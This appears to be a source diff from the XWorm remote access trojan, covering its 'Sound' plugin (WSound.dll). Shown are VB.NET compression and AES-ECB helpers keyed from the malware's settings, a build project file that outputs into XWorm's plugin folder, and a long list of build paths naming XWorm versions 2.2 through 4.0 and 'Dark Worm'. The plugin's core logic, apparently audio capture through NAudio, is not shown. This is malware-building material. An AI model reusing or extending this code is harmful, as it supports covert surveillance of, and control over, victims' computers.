||||
|
||||
Function Decompress(ByVal input As Byte()) As Byte()
|
||||
Using source = New MemoryStream(input)
|
||||
Dim lengthBytes As Byte() = New Byte(3) {}
|
||||
source.Read(lengthBytes, 0, 4)
|
||||
Dim length = BitConverter.ToInt32(lengthBytes, 0)
|
||||
|
||||
Using decompressionStream = New GZipStream(source, CompressionMode.Decompress)
|
||||
Dim result = New Byte(length - 1) {}
|
||||
decompressionStream.Read(result, 0, length)
|
||||
Return result
|
||||
End Using
|
||||
End Using
|
||||
End Function
|
||||
Function Compress(ByVal input As Byte()) As Byte()
|
||||
Using result = New MemoryStream()
|
||||
Dim lengthBytes = BitConverter.GetBytes(input.Length)
|
||||
result.Write(lengthBytes, 0, 4)
|
||||
|
||||
Using compressionStream = New GZipStream(result, CompressionMode.Compress)
|
||||
compressionStream.Write(input, 0, input.Length)
|
||||
compressionStream.Flush()
|
||||
End Using
|
||||
|
||||
Return result.ToArray()
|
||||
End Using
|
||||
End Function
|
||||
|
||||
Function AES_Encryptor(ByVal input As Byte()) As Byte()
|
||||
Dim AES_ As New RijndaelManaged
|
||||
Dim Hash As New MD5CryptoServiceProvider
|
||||
Try
|
||||
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
|
||||
AES_.Mode = CipherMode.ECB
|
||||
Dim DESEncrypter As ICryptoTransform = AES_.CreateEncryptor
|
||||
Dim Buffer As Byte() = input
|
||||
Return DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Function
|
||||
|
||||
Function AES_Decryptor(ByVal input As Byte()) As Byte()
|
||||
Dim AES_ As New RijndaelManaged
|
||||
Dim Hash As New MD5CryptoServiceProvider
|
||||
Try
|
||||
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
|
||||
AES_.Mode = CipherMode.ECB
|
||||
Dim DESDecrypter As ICryptoTransform = AES_.CreateDecryptor
|
||||
Dim Buffer As Byte() = input
|
||||
Return DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Function
|
||||
End Module
|
||||
@@ -0,0 +1,135 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
|
||||
<Import Project="..\..\..\packages\ILMerge.3.0.41\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.41\build\ILMerge.props')" />
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{633ADE16-1C92-4F3E-8366-82DD3BAA62F5}</ProjectGuid>
|
||||
<OutputType>Library</OutputType>
|
||||
<RootNamespace>Plugin</RootNamespace>
|
||||
<AssemblyName>WSound</AssemblyName>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<MyType>Windows</MyType>
|
||||
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
|
||||
<NuGetPackageImportStamp>
|
||||
</NuGetPackageImportStamp>
|
||||
<TargetFrameworkProfile />
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<DebugSymbols>false</DebugSymbols>
|
||||
<DebugType>none</DebugType>
|
||||
<DefineDebug>true</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<OutputPath>..\..\..\XWorm\bin\Debug\Plugins\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
<Prefer32Bit>false</Prefer32Bit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<DefineDebug>false</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
<Prefer32Bit>false</Prefer32Bit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionExplicit>On</OptionExplicit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionCompare>Binary</OptionCompare>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionStrict>Off</OptionStrict>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionInfer>On</OptionInfer>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="NAudio">
|
||||
<HintPath>..\NAudio.dll</HintPath>
|
||||
</Reference>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Xml" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Import Include="Microsoft.VisualBasic" />
|
||||
<Import Include="System" />
|
||||
<Import Include="System.Collections" />
|
||||
<Import Include="System.Collections.Generic" />
|
||||
<Import Include="System.Data" />
|
||||
<Import Include="System.Diagnostics" />
|
||||
<Import Include="System.Linq" />
|
||||
<Import Include="System.Xml.Linq" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Plugin.vb" />
|
||||
<Compile Include="My Project\AssemblyInfo.vb" />
|
||||
<Compile Include="My Project\Application.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Application.myapp</DependentUpon>
|
||||
<DesignTime>True</DesignTime>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Resources.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DesignTime>True</DesignTime>
|
||||
<DependentUpon>Resources.resx</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Settings.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Settings.settings</DependentUpon>
|
||||
<DesignTimeSharedInput>True</DesignTimeSharedInput>
|
||||
</Compile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<EmbeddedResource Include="My Project\Resources.resx">
|
||||
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
|
||||
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
|
||||
<CustomToolNamespace>My.Resources</CustomToolNamespace>
|
||||
<SubType>Designer</SubType>
|
||||
</EmbeddedResource>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="ILMerge.props" />
|
||||
<None Include="My Project\Application.myapp">
|
||||
<Generator>MyApplicationCodeGenerator</Generator>
|
||||
<LastGenOutput>Application.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="My Project\Settings.settings">
|
||||
<Generator>SettingsSingleFileGenerator</Generator>
|
||||
<CustomToolNamespace>My</CustomToolNamespace>
|
||||
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="packages.config" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Content Include="ILMergeOrder.txt" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
|
||||
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
|
||||
<PropertyGroup>
|
||||
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
|
||||
</PropertyGroup>
|
||||
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.41\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.41\build\ILMerge.props'))" />
|
||||
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
|
||||
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
|
||||
</Target>
|
||||
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
|
||||
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
|
||||
Other similar extension points exist, see Microsoft.Common.targets.
|
||||
<Target Name="BeforeBuild">
|
||||
</Target>
|
||||
<Target Name="AfterBuild">
|
||||
</Target>
|
||||
-->
|
||||
</Project>
|
||||
Binary file not shown.
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
|
||||
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,2 @@
|
||||
Sound.dll
|
||||
NAudio.dll
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
|
||||
30af9b76582481430335bb8ec418458428ffd00b88cc20ed0bb70c89f0df7655
|
||||
@@ -0,0 +1,223 @@
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\bin\Debug\Sound.dll
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\bin\Debug\Sound.pdb
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\bin\Debug\Sound.xml
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\bin\Debug\NAudio.dll
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\obj\Debug\Sound.vbprojResolveAssemblyReference.cache
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\obj\Debug\Sound.Resources.resources
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.Cache
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\obj\Debug\Sound.dll
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\obj\Debug\Sound.xml
|
||||
C:\Users\LapTop\Documents\Visual Studio 2015\Projects\Sound\Sound\obj\Debug\Sound.pdb
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\bin\Debug\Sound.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\bin\Debug\Sound.pdb
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\bin\Debug\Sound.xml
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.Cache
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.Resources.resources
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
